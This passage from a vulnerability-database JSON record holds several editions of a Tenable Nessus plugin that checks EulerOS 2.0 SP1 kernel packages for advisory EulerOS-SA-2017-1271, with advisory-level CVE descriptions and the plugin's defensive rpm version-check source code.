the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 3, "enchantments": {}, "hash": "aa1793ed66ef346a2bf6a9481360099a1e70475b196b1301370b4b292270f003", "hashmap": [{"hash": "3600026d4759e706054e168421237172", "key": "sourceData"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "66f446fdb7c2006a04bea5463c388f23", "key": "references"}, {"hash": "7f3fc6aad33a1863cefc360385a3b643", "key": "pluginID"}, {"hash": "b2573c147a18eb3538492c3eb18bffba", "key": "title"}, {"hash": "000772fd01acf5766d8aac2325e9c8b0", "key": "description"}, {"hash": "b79db8712766d5c42d714bea58fdbe62", "key": "href"}, {"hash": "2c23739456a1260ec0dda9d22fdc03d2", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "e1519913cf3c1af4f5d3be923ec09827", "key": "cvelist"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "8025de7ead78142d575757b1ef68ec3b", "key": "cpe"}, {"hash": "67933a273737791ab6f71e29a2605c31", "key": "naslFamily"}, {"hash": "27ce5ebcc4fc701bddec8e3e8a5d5139", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=104296", "id": "EULEROS_SA-2017-1271.NASL", "lastseen": "2017-11-02T22:36:16", "modified": "2017-11-02T00:00:00", "naslFamily": "Huawei Local Security Checks", "objectVersion": "1.3", "pluginID": "104296", "published": "2017-11-01T00:00:00", "references": ["http://www.nessus.org/u?bb1444fd"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104296);\n script_version(\"$Revision: 3.2 $\");\n script_cvs_date(\"$Date: 2017/11/02 13:39:15 $\");\n\n script_cve_id(\n \"CVE-2017-1000111\",\n \"CVE-2017-12188\",\n \"CVE-2017-12192\",\n \"CVE-2017-15265\",\n \"CVE-2017-15274\",\n \"CVE-2017-15649\"\n );\n script_osvdb_id(\n 163121,\n 167115,\n 167127,\n 167222,\n 167244,\n 167826\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1271)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5,\n when nested virtualisation is used, does not properly\n traverse guest pagetable entries to resolve a guest\n virtual address, which allows L1 guest OS users to\n execute arbitrary code on the host OS or cause a denial\n of service (incorrect index during page walking, and\n host OS crash), aka an MMU potential stack buffer\n overrun.(CVE-2017-12188)\n\n - A vulnerability was found in the Key Management sub\n component of the Linux kernel, where when trying to\n issue a KEYTCL_READ on negative key would lead to a\n NULL pointer dereference. A local attacker could use\n this flaw to crash the kernel.(CVE-2017-12192)\n\n - security/keys/keyctl.c in the Linux kernel before\n 4.11.5 does not consider the case of a NULL payload in\n conjunction with a nonzero length value, which allows\n local users to cause a denial of service (NULL pointer\n dereference and OOPS) via a crafted add_key or keyctl\n system call, a different vulnerability than\n CVE-2017-12192.(CVE-2017-15274)\n\n - Linux kernel: heap out-of-bounds in AF_PACKET sockets.\n This new issue is analogous to previously disclosed\n CVE-2016-8655. In both cases, a socket option that\n changes socket state may race with safety checks in\n packet_set_ring. Previously with PACKET_VERSION. This\n time with PACKET_RESERVE. The solution is similar: lock\n the socket for the update. This issue may be\n exploitable, we did not investigate further. As this\n issue affects PF_PACKET sockets, it requires\n CAP_NET_RAW in the process namespace. But note that\n with user namespaces enabled, any process can create a\n namespace in which it has\n CAP_NET_RAW.(CVE-2017-1000111)\n\n - Use-after-free vulnerability in the Linux kernel before\n 4.14-rc5 allows local users to have unspecified impact\n via vectors related to /dev/snd/seq.(CVE-2017-15265)\n\n - net/packet/af_packet.c in the Linux kernel before\n 4.13.6 allows local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind)\n that leads to a use-after-free, a different\n vulnerability than CVE-2017-6346.(CVE-2017-15649)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # http://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bb1444fd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-ori\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.49.1.152\",\n \"kernel-debug-3.10.0-229.49.1.152\",\n \"kernel-debuginfo-3.10.0-229.49.1.152\",\n \"kernel-debuginfo-common-x86_64-3.10.0-229.49.1.152\",\n \"kernel-devel-3.10.0-229.49.1.152\",\n \"kernel-headers-3.10.0-229.49.1.152\",\n \"kernel-ori-3.10.0-229\",\n \"kernel-tools-3.10.0-229.49.1.152\",\n \"kernel-tools-libs-3.10.0-229.49.1.152\",\n \"perf-3.10.0-229.49.1.152\",\n \"python-perf-3.10.0-229.49.1.152\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1271)", "type": "nessus", "viewCount": 10}, "differentElements": ["modified", "sourceData"], "edition": 3, "lastseen": "2017-11-02T22:36:16"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "cvelist": ["CVE-2017-12188", "CVE-2017-1000111", "CVE-2017-15274", "CVE-2017-15265", "CVE-2017-14991", "CVE-2017-15649", "CVE-2017-1000112", "CVE-2017-12192"], "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "According to the versions of the kernel packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5, when nested virtualisation is used, does not properly traverse guest pagetable entries to resolve a guest virtual address, which allows L1 guest OS users to execute arbitrary code on the host OS or cause a denial of service (incorrect index during page walking, and host OS crash), aka an MMU potential stack buffer overrun.(CVE-2017-12188)\n\n - A vulnerability was found in the Key Management sub component of the Linux kernel, where when trying to issue a KEYTCL_READ on negative key would lead to a NULL pointer dereference. A local attacker could use this flaw to crash the kernel.(CVE-2017-12192)\n\n - security/keys/keyctl.c in the Linux kernel before 4.11.5 does not consider the case of a NULL payload in conjunction with a nonzero length value, which allows local users to cause a denial of service (NULL pointer dereference and OOPS) via a crafted add_key or keyctl system call, a different vulnerability than CVE-2017-12192.(CVE-2017-15274)\n\n - Linux kernel: heap out-of-bounds in AF_PACKET sockets.\n This new issue is analogous to previously disclosed CVE-2016-8655. In both cases, a socket option that changes socket state may race with safety checks in packet_set_ring. Previously with PACKET_VERSION. This time with PACKET_RESERVE. The solution is similar: lock the socket for the update. This issue may be exploitable, we did not investigate further. As this issue affects PF_PACKET sockets, it requires CAP_NET_RAW in the process namespace. But note that with user namespaces enabled, any process can create a namespace in which it has CAP_NET_RAW.(CVE-2017-1000111)\n\n - Use-after-free vulnerability in the Linux kernel before 4.14-rc5 allows local users to have unspecified impact via vectors related to /dev/snd/seq.(CVE-2017-15265)\n\n - net/packet/af_packet.c in the Linux kernel before 4.13.6 allows local users to gain privileges via crafted system calls that trigger mishandling of packet_fanout data structures, because of a race condition (involving fanout_add and packet_do_bind) that leads to a use-after-free, a different vulnerability than CVE-2017-6346.(CVE-2017-15649)\n\n - The sg_ioctl function in drivers/scsi/sg.c in the Linux kernel before 4.13.4 allows local users to obtain sensitive information from uninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE ioctl call for /dev/sg0.(CVE-2017-14991)\n\n - An exploitable memory corruption flaw was found in the Linux kernel. The append path can be erroneously switched from UFO to non-UFO in ip_ufo_append_data() when building an UFO packet with MSG_MORE option. If unprivileged user namespaces are available, this flaw can be exploited to gain root privileges.(CVE-2017-1000112)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 12, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}}, "hash": "31039c7a96ea6fe8b3365b91701fcbfa8c61acbea201e073720ab5432fe7aac2", "hashmap": [{"hash": "77a934ad743276b761d63310df7ef73c", "key": "cpe"}, {"hash": "9c6fe61712654f56360b12011e3de300", "key": "modified"}, {"hash": "5d448df9b5b03d5d1af99dcec80426e9", "key": "description"}, {"hash": "cfd16da9581e0c21db590e40dfd9e493", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "66f446fdb7c2006a04bea5463c388f23", "key": "references"}, {"hash": "8ff36b7b08da9f231378545ee6a95414", "key": "sourceData"}, {"hash": "7f3fc6aad33a1863cefc360385a3b643", "key": "pluginID"}, {"hash": "b2573c147a18eb3538492c3eb18bffba", "key": "title"}, {"hash": "9085609a2f5279d2a09e7acf95bb1a88", "key": "cvelist"}, {"hash": "b79db8712766d5c42d714bea58fdbe62", "key": "href"}, {"hash": "2c23739456a1260ec0dda9d22fdc03d2", "key": "published"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "67933a273737791ab6f71e29a2605c31", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=104296", "id": "EULEROS_SA-2017-1271.NASL", "lastseen": "2018-08-11T05:04:50", "modified": "2018-08-10T00:00:00", "naslFamily": "Huawei Local Security Checks", "objectVersion": "1.3", "pluginID": "104296", "published": "2017-11-01T00:00:00", "references": ["http://www.nessus.org/u?bb1444fd"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104296);\n script_version(\"3.10\");\n script_cvs_date(\"Date: 2018/08/10 15:55:08\");\n\n script_cve_id(\n \"CVE-2017-1000111\",\n \"CVE-2017-1000112\",\n \"CVE-2017-12188\",\n \"CVE-2017-12192\",\n \"CVE-2017-14991\",\n \"CVE-2017-15265\",\n \"CVE-2017-15274\",\n \"CVE-2017-15649\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1271)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5,\n when nested virtualisation is used, does not properly\n traverse guest pagetable entries to resolve a guest\n virtual address, which allows L1 guest OS users to\n execute arbitrary code on the host OS or cause a denial\n of service (incorrect index during page walking, and\n host OS crash), aka an MMU potential stack buffer\n overrun.(CVE-2017-12188)\n\n - A vulnerability was found in the Key Management sub\n component of the Linux kernel, where when trying to\n issue a KEYTCL_READ on negative key would lead to a\n NULL pointer dereference. A local attacker could use\n this flaw to crash the kernel.(CVE-2017-12192)\n\n - security/keys/keyctl.c in the Linux kernel before\n 4.11.5 does not consider the case of a NULL payload in\n conjunction with a nonzero length value, which allows\n local users to cause a denial of service (NULL pointer\n dereference and OOPS) via a crafted add_key or keyctl\n system call, a different vulnerability than\n CVE-2017-12192.(CVE-2017-15274)\n\n - Linux kernel: heap out-of-bounds in AF_PACKET sockets.\n This new issue is analogous to previously disclosed\n CVE-2016-8655. In both cases, a socket option that\n changes socket state may race with safety checks in\n packet_set_ring. Previously with PACKET_VERSION. This\n time with PACKET_RESERVE. The solution is similar: lock\n the socket for the update. This issue may be\n exploitable, we did not investigate further. As this\n issue affects PF_PACKET sockets, it requires\n CAP_NET_RAW in the process namespace. But note that\n with user namespaces enabled, any process can create a\n namespace in which it has\n CAP_NET_RAW.(CVE-2017-1000111)\n\n - Use-after-free vulnerability in the Linux kernel before\n 4.14-rc5 allows local users to have unspecified impact\n via vectors related to /dev/snd/seq.(CVE-2017-15265)\n\n - net/packet/af_packet.c in the Linux kernel before\n 4.13.6 allows local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind)\n that leads to a use-after-free, a different\n vulnerability than CVE-2017-6346.(CVE-2017-15649)\n\n - The sg_ioctl function in drivers/scsi/sg.c in the Linux\n kernel before 4.13.4 allows local users to obtain\n sensitive information from uninitialized kernel\n heap-memory locations via an SG_GET_REQUEST_TABLE ioctl\n call for /dev/sg0.(CVE-2017-14991)\n\n - An exploitable memory corruption flaw was found in the\n Linux kernel. The append path can be erroneously\n switched from UFO to non-UFO in ip_ufo_append_data()\n when building an UFO packet with MSG_MORE option. If\n unprivileged user namespaces are available, this flaw\n can be exploited to gain root\n privileges.(CVE-2017-1000112)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # http://developer.huawei.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1271\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?bb1444fd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.49.1.152\",\n \"kernel-debug-3.10.0-229.49.1.152\",\n \"kernel-debuginfo-3.10.0-229.49.1.152\",\n \"kernel-debuginfo-common-x86_64-3.10.0-229.49.1.152\",\n \"kernel-devel-3.10.0-229.49.1.152\",\n \"kernel-headers-3.10.0-229.49.1.152\",\n \"kernel-tools-3.10.0-229.49.1.152\",\n \"kernel-tools-libs-3.10.0-229.49.1.152\",\n \"perf-3.10.0-229.49.1.152\",\n \"python-perf-3.10.0-229.49.1.152\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1271)", "type": "nessus", "viewCount": 11}, "differentElements": ["cvss"], "edition": 12, "lastseen": "2018-08-11T05:04:50"}], "edition": 24, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "77a934ad743276b761d63310df7ef73c"}, {"key": "cvelist", "hash": "947b607053a3e8b8b136a4a68e7e2992"}, {"key": "cvss", "hash": "f74481c4d3fb2a622ac8c8a438ded811"}, {"key": "cvss3", "hash": "85da04adfdf3db30015e70536363a88d"}, {"key": "description", "hash": "1fffb424dc4ef5d64db9c838acac60cc"}, {"key": "href", "hash": "60bbc994d7c2f83d786d256af97bbde6"}, {"key": "modified", "hash": "2c23739456a1260ec0dda9d22fdc03d2"}, {"key": "naslFamily", "hash": "67933a273737791ab6f71e29a2605c31"}, {"key": "pluginID", "hash": "7f3fc6aad33a1863cefc360385a3b643"}, {"key": "published", "hash": "2c23739456a1260ec0dda9d22fdc03d2"}, {"key": "references", "hash": "ef7b4f3e2ff6266e74f4b4252b7a7d11"}, {"key": "reporter", "hash": "42ba02a7c521490011837a978982f202"}, {"key": "sourceData", "hash": "5b9049e72ce69385b9596fe7bf427390"}, {"key": "title", "hash": "b2573c147a18eb3538492c3eb18bffba"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "82440e6fef90b4ad634e132146eacb3d9bdd60dff094444d98fe05f995cdda79", "viewCount": 11, "enchantments": {"dependencies": {"references": [{"type": "f5", "idList": ["F5:K44309215", "F5:K60250153", "F5:K32616738", "F5:K38472857", "F5:K33567812", "F5:K11023978"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310851594", "OPENVAS:1361412562310851632", "OPENVAS:1361412562310843279", "OPENVAS:1361412562310843274", "OPENVAS:1361412562310851638", "OPENVAS:1361412562310843276", "OPENVAS:1361412562311220171271", "OPENVAS:1361412562310843278", "OPENVAS:1361412562310843275"]}, {"type": "cve", "idList": ["CVE-2017-1000112", "CVE-2017-15265", "CVE-2017-12188", "CVE-2017-6346", "CVE-2017-14991", "CVE-2017-1000111", "CVE-2017-15649", "CVE-2017-15274", "CVE-2016-8655", "CVE-2017-12192"]}, {"type": "virtuozzo", "idList": ["VZA-2017-106", "VZA-2017-073", "VZA-2017-099", "VZA-2017-094", "VZA-2017-072", "VZA-2017-100", "VZA-2017-096", "VZA-2017-071", "VZA-2017-095", "VZA-2017-107"]}, {"type": "seebug", "idList": ["SSV:96778", "SSV:96343", "SSV:92567"]}, {"type": "nessus", "idList": ["SUSE_SU-2017-2150-1.NASL", "OPENSUSE-2017-1224.NASL", "VIRTUOZZO_VZA-2017-073.NASL", "UBUNTU_USN-3384-1.NASL", "OPENSUSE-2017-1194.NASL", "VIRTUOZZO_VZA-2017-072.NASL", "ALA_ALAS-2017-914.NASL", "SUSE_SU-2018-0562-1.NASL", "PHOTONOS_PHSA-2017-0043_LINUX.NASL", "PHOTONOS_PHSA-2017-0043.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2017:3165-1", "SUSE-SU-2017:3315-1", "SUSE-SU-2017:2150-1", "SUSE-SU-2017:3267-1", "SUSE-SU-2018:0562-1", "SUSE-SU-2017:2131-1", "OPENSUSE-SU-2017:2905-1", "SUSE-SU-2017:2142-1", "OPENSUSE-SU-2017:2846-1", "SUSE-SU-2018:0664-1"]}, {"type": "ubuntu", "idList": ["USN-3386-2", "USN-3384-1", "USN-3384-2", "USN-3385-2", "USN-3386-1", "USN-3385-1"]}, {"type": "hackerone", "idList": ["H1:684573"]}, {"type": "cloudfoundry", "idList": ["CFOUNDRY:55CD35F3011A699D7E30AD5252951E34"]}, {"type": "amazon", "idList": ["ALAS-2017-914", "ALAS-2017-868"]}, {"type": "centos", "idList": ["CESA-2017:3200"]}], "modified": "2020-05-06T00:42:08", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2020-05-06T00:42:08", "rev": 2}, "vulnersScore": 7.8}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104296);\n script_version(\"3.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/04\");\n\n script_cve_id(\n \"CVE-2017-1000111\",\n \"CVE-2017-1000112\",\n \"CVE-2017-12188\",\n \"CVE-2017-12192\",\n \"CVE-2017-14991\",\n \"CVE-2017-15265\",\n \"CVE-2017-15274\",\n \"CVE-2017-15649\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2017-1271)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - arch/x86/kvm/mmu.c in the Linux kernel through 4.13.5,\n when nested virtualisation is used, does not properly\n traverse guest pagetable entries to resolve a guest\n virtual address, which allows L1 guest OS users to\n execute arbitrary code on the host OS or cause a denial\n of service (incorrect index during page walking, and\n host OS crash), aka an MMU potential stack buffer\n overrun.(CVE-2017-12188)\n\n - A vulnerability was found in the Key Management sub\n component of the Linux kernel, where when trying to\n issue a KEYTCL_READ on negative key would lead to a\n NULL pointer dereference. A local attacker could use\n this flaw to crash the kernel.(CVE-2017-12192)\n\n - security/keys/keyctl.c in the Linux kernel before\n 4.11.5 does not consider the case of a NULL payload in\n conjunction with a nonzero length value, which allows\n local users to cause a denial of service (NULL pointer\n dereference and OOPS) via a crafted add_key or keyctl\n system call, a different vulnerability than\n CVE-2017-12192.(CVE-2017-15274)\n\n - Linux kernel: heap out-of-bounds in AF_PACKET sockets.\n This new issue is analogous to previously disclosed\n CVE-2016-8655. In both cases, a socket option that\n changes socket state may race with safety checks in\n packet_set_ring. Previously with PACKET_VERSION. This\n time with PACKET_RESERVE. The solution is similar: lock\n the socket for the update. This issue may be\n exploitable, we did not investigate further. As this\n issue affects PF_PACKET sockets, it requires\n CAP_NET_RAW in the process namespace. But note that\n with user namespaces enabled, any process can create a\n namespace in which it has\n CAP_NET_RAW.(CVE-2017-1000111)\n\n - Use-after-free vulnerability in the Linux kernel before\n 4.14-rc5 allows local users to have unspecified impact\n via vectors related to /dev/snd/seq.(CVE-2017-15265)\n\n - net/packet/af_packet.c in the Linux kernel before\n 4.13.6 allows local users to gain privileges via\n crafted system calls that trigger mishandling of\n packet_fanout data structures, because of a race\n condition (involving fanout_add and packet_do_bind)\n that leads to a use-after-free, a different\n vulnerability than CVE-2017-6346.(CVE-2017-15649)\n\n - The sg_ioctl function in drivers/scsi/sg.c in the Linux\n kernel before 4.13.4 allows local users to obtain\n sensitive information from uninitialized kernel\n heap-memory locations via an SG_GET_REQUEST_TABLE ioctl\n call for 